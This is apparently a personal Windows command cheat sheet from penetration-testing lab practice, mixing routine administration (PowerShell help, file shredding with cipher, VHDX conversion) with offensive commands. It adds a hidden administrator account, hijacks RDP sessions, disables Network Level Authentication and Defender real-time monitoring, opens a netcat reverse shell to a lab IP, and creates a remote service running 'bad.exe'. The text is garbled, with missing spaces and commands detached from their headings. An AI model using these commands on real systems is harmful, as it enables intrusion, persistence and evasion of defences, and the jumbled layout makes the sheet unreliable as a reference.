Check User Privileges, display the privileges of the currently logged-in user:
whoami/priv
Check File Access Permissions, list the access control details for a specified file:
icacls
Download a File from an HTTP Server
Use wget to download a file from a specified HTTP server in Windows:
wgethttp://xxxxx/xxx-outfilexx
Transfer Files between Virtual Machines
Download a file from a Windows machine to another VM. Start an HTTP server on the destination and use wget to retrieve the file:
wgethttp://10.10.134.86:4444/exploit_me
Note: Ensure the HTTP server is running on the destination system before executing this command.
Add a Local Windows User and Assign to Administrators
Create a Windows user named "htb" with the password "abc123!" and add it to the administrators group:
Convert VHDX to VDI using VirtualBox
Use VirtualBox's VBoxManage tool to convert a VHDX file to the VDI format:
File shredding
Deleting files by simply removing them from your hard disk and recycle bin is not enough because the files are not permanently deleted and they can still be restored. There are different technics to remove them permanently from your fille system. You can overwrite the deleted data or by using a shredding tool that destroy the data.
Use the Windows built-in Cipher security tool to overwrite deleted data.
For example, the cipher /w:E command causes all deallocated space on drive E to be overwritten
Darik's Boot and Nuke ("DBAN") is a self-contained boot image that securely wipes hard disk drives (HDDs). DBAN is appropriate for personal use, bulk data destruction, or emergency data destruction for HDDs, but is not recommended for solid-state drives (SSDs), sanitization that requires auditable compliance documentation, or technical support.
net user htb abc123! /add
net localgroup administrators htb /add
"C:\Program Files\Oracle\VBoxManage.exe" clonemedium disk "C:\Users\User\Documents\kali\kali-062024\KALI-JA\Virtual Hard Disks\Kali.vhdx" "C:\Users\User\Documents\kali\kali-062024\KALI-JA\Virtual Hard Disks\kali.vdi"
cipher /w:[DRIVELETTER]
cipher /w:E
# RDP hijacking via CMD
# Example: Take over a disconnected session
Query system
tscon 3 /dest:rdp-tcp
Find a keyword in a directory content
ls fatty-client\ -recurse | Select-String "8000" | Select Path, LineNumber | Format-List
# Find .txt files in the current directory using PowerShell
Get-ChildItem *.txt
# Retrieve information on a specific package via PowerShell
Get-WmiObject -Class Win32_Product | Where-Object Name -Match TOSHIBA | Format-Table
# Get package info using Get-Package in PowerShell
Get-Package *TOSHIBA*
# Enable Remote Desktop Protocol via PowerShell
Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -name "fDenyTSConnections" -value 0
# Allow Remote Desktop through Windows Firewall
Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
# Add a user to the Remote Desktop Users group
Add-LocalGroupMember -Group "Remote Desktop Users" -Member "username"
# Change the administrator's password via CMD
net user USERNAME PASSWORD
# Disable Network Level Authentication to allow RDP
$TargetServer = "SCADA-SLAVE" (Get-WmiObject -class "Win32_TSGeneralSetting" -Namespace root\cimv2\terminalservices -ComputerName $TargetServer -Filter "TerminalName='RDP-tcp'").SetUserAuthenticationRequired(0)
# Disable NTLM to permit RDP - registry command
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-TCP" /v UserAuthentication /t REG_DWORD /d "0" /f
# Enable RDP via command line alongside firewall settings
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes
# Disable real-time monitoring of antivirus through PowerShell
Set-MpPreference -DisableRealtimeMonitoring $true
#get help with a powerhsll module
get help
Get-Help Get-Process
# If you want more detailed information, including examples, use:
Get-Help Get-Process -Detailed
# For the most comprehensive help, including parameter descriptions, use:
Get-Help Get-Process -Full
#And if you’re looking for examples specifically, try:
Get-Help Get-Process -Examples
# Get a reverse shell from Windows using netcat
runas /netonly /user:ZA.TRYHACKME.COM\t1_leonard.summers "c:\tools\nc64.exe -e cmd.exe 10.50.46.122 4443"
# Create and start a malicious service for a reverse shell
runas /netonly /user:ZA.TRYHACKME.COM\t1_leonard.summers "sc.exe \\thmiis.za.tryhackme.com create LOLIservice-3249 binPath= "%windir%\bad.exe" start= auto"
runas /netonly /user:ZA.TRYHACKME.COM\t1_leonard.summers "sc.exe \\thmiis.za.tryhackme.com start LOLIservice-3249"
